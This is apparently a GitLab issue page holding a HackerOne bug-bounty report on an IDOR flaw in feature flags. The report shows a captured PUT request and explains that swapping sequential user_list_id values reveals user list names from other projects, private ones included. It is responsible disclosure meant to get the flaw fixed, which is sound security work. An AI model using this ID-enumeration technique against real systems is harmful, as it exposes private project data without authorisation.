Skip to content

IDOR-Get feature flag user list (including user IDs) of any private/public projects

HackerOne report #962408 by ashish_r_padelkar on 2020-08-19, assigned to @kaunghtet:

Report

Report

Summary

Hello,

It is possible to get feature flag user list of any private/public project by just supplying the 2 digit sequential ID in the request. This way we can enumerate all such feature flag user lists.

Steps to reproduce
  1. Go to https://gitlab.com/<NameSpace>/project_1/-/feature_flags
    2.EDIT any existing feature flag.
  2. In Type Dropdown select the User List option and then select the available user list from your project.
  3. Click save and capture the below request.
PUT /group_new_1/project_1/-/feature_flags/1 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 295  
Accept: application/json, text/plain, */*  
X-CSRF-Token: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com/group_new_1/project_1/-/feature_flags/1/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1


{"operations_feature_flag":{"name":"wwwwww","description":"","version":"new_version_flag","active":true,"strategies_attributes":[{"id":532,"name":"gitlabUserList","_destroy":false,"scopes_attributes":[{"id":1146,"_destroy":false,"environment_scope":"wwww"}],"parameters":{},"user_list_id":39}]}}
  1. Just change the value of user_list_id parameter in above request to any 2 digit sequential ID and send the request.

You should see the Name of the user list in the response as well as on the feature flag page when you reload. Note that this is also possible when feature flags you obtain belongs to private projects.

What is the current bug behavior?

Possible to get Feature Flag user list name of any project (including private)

What is the expected correct behavior?

If feature flag user list belongs to private project, you should not be able to get the name of it.

Output of checks

This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 9bb21f0d61c

Regards,
Ashish

Impact

IDOR to get feature flag user list names from any project (including private)

Edited by Kaung Htet Aung